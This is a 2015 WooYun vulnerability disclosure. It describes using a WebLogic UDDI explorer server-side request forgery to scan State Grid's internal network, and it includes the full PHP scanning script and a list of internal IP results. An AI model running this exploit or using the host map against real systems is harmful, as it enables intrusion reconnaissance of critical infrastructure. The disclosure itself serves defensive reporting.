当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134123

漏洞标题:我是如何用某漏洞扫描国家电网内网的

相关厂商:国家电网公司

漏洞作者: 路人甲

提交时间:2015-08-14 15:31

修复时间:2015-10-02 09:48

公开时间:2015-10-02 09:48

漏洞类型:应用配置错误

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

神器发现

详细说明:

http://10.90.233.19/ FUck closed
http://10.90.233.20/ FUck closed
http://10.90.233.21/ FUck closed
http://10.90.233.22/ FUck closed
http://10.90.233.23/ FUck closed
http://10.90.233.24/ FUck closed
http://10.90.233.25/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.25/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.26/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.26/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.27/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.27/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.28/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.28/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.29/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.29/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.30/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.30/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.31/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.31/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.32/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.32/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.33/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.33/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.34/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.35/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.36/ FUck closed
http://10.90.233.37/ FUck closed
http://10.90.233.38/ FUck closed
http://10.90.233.39/ FUck closed
http://10.90.233.40/ FUck closed
http://10.90.233.41/ FUck closed
http://10.90.233.42/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.43/ FUck closed
http://10.90.233.44/ FUck closed
http://10.90.233.45/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.46/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.46/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.47/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.47/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.48/ FUck closed
http://10.90.233.49/ FUck closed
http://10.90.233.50/ FUck closed
http://10.90.233.51/ FUck closed
http://10.90.233.52/ FUck closed
http://10.90.233.53/ FUck closed
http://10.90.233.54/ FUck closed
http://10.90.233.55/ FUck closed
http://10.90.233.56/ FUck closed
http://10.90.233.57/ FUck closed
http://10.90.233.58/ FUck closed
http://10.90.233.59/ FUck closed
http://10.90.233.60/ FUck closed
http://10.90.233.61/ FUck closed
http://10.90.233.62/ FUck closed
http://10.90.233.63/ FUck closed
http://10.90.233.64/ FUck closed
http://10.90.233.65/ FUck closed
http://10.90.233.66/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.66/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.67/ FUck closed
http://10.90.233.68/ FUck closed
http://10.90.233.69/ FUck closed
http://10.90.233.70/ FUck closed
http://10.90.233.71/ FUck closed
http://10.90.233.72/ FUck closed
http://10.90.233.73/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.73/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.74/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.74/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.75/ FUck closed

漏洞证明:

2222.png


cat web.php 
<?php
for($m=233;$m<250;$m++){
for($i=1;$i<254;$i++){
$url="http://10.90.$m.".$i."/";
expyou($argv[1],$url);
}
}
expyou($argv[1],$argv[2]);
function expyou($target,$url){
$result=file_get_contents("$target/uddiexplorer/SearchPublicRegistries.jsp?operator=$url&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search");
preg_match_all("#An error has occurred<BR>(.*?)</table#is",$result,$info);
if(strpos($info[1][0],"but could not connect over HTTP to server")){
echo "$url FUck closed\r\n";
}else{
echo $url.trim($info[1][0])."\r\n";
}
}

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-18 09:47

厂商回复:

辛苦,漏洞在洞主提交之前已下发通知处置,还是感谢洞主提交。

最新状态:

暂无